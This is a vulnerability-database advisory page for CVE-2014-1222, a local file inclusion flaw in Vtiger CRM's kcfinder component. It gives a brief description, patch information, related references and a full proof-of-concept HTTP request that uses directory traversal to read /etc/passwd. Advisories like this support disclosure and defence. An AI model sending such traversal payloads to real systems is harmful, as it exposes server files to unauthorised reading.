Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:61788
HistoryMar 13, 2014 - 12:00 a.m.

Vtiger CRM文件包含漏洞

2014-03-1300:00:00
Root
www.seebug.org
34

EPSS

0.053

Percentile

93.1%

JSON

CVE ID:CVE-2014-1222

vtiger CRM是一套基于Web以销售能力自动化(SFA)为主的客户关系管理系统(CRM )。

本地文件包含漏洞被发现在vtigerCRM 6.0 RC的’kcfinder’组件。攻击者可以利用漏洞通过目录遍历序列包含任意文件,并泄漏任意文件内容。
0
Vtiger CRM 5.4.0
Vtiger CRM 6.0 RC
Vtiger CRM 6.0.0 GA
厂商补丁:

vtiger CRM

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.vtiger.com/


                                                POST /vtigercrm6rc2/kcfinder/browse.php?type=files&lng=en&act=download HTTP/1.1
Host: 192.168.56.103
Proxy-Connection: keep-alive
Content-Length: 58
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.56.103
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://192.168.56.103/vtigercrm6rc2/kcfinder/browse.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,es;q=0.6,pl;q=0.4
Cookie: PHPSESSID=ejkcv9cl3efa861460ufr39hl2; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off

dir=files&file=/../../../../../../../../../../../etc/passwd

Related

exploitpack 2
prion 1
packetstorm 2
exploitdb 3
openvas 1
cvelist 1
nvd 1
cve 1
zdt 2
securityvulns 2
dsquare 1
exploitpack
exploitpack
vTiger CRM 5.4.06.0 RC6.0.0 GA - browse.php Local File Inclusion
2014-03-12 00:00:00
Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities
2015-03-31 00:00:00
prion
prion
Directory traversal
2014-08-12 23:55:00
packetstorm
packetstorm
Vtiger CRM 5.4.0 / 6.0 RC / 6.0.0 GA Local File Inclusion
2014-03-12 00:00:00
FiyoCMS 2.0.1.8 XSS / SQL Injection / URL Bypass
2015-03-30 00:00:00
exploitdb
exploitdb
vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion
2014-03-12 00:00:00
KCFinder 2.51 - Local File Disclosure
2013-08-15 00:00:00
Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities
2015-03-31 00:00:00
openvas
openvas
vTiger CRM 'file' Arbitrary File Disclosure Vulnerability
2014-08-25 00:00:00
cvelist
cvelist
CVE-2014-1222
2014-08-12 23:00:00
nvd
nvd
CVE-2014-1222
2014-08-12 23:55:03
cve
cve
CVE-2014-1222
2014-08-12 23:55:03
zdt
zdt
Vtiger CRM 5.4.0, 6.0 RC, 6.0.0 GA - Local File Inclusion Vulnerability
2014-03-12 00:00:00
Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities
2015-04-02 00:00:00
securityvulns
securityvulns
CVE-2014-1222 - Local File Inclusion in Vtiger CRM
2014-05-05 00:00:00
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
2014-05-05 00:00:00
dsquare
dsquare
vTiger CRM 5.4.0 kcfinder LFI
2014-04-02 00:00:00

EPSS

0.053

Percentile

93.1%

JSON
Related for SSV:61788
exploitpack2prion1packetstorm2exploitdb3openvas1cvelist1nvd1cve1zdt2securityvulns2dsquare1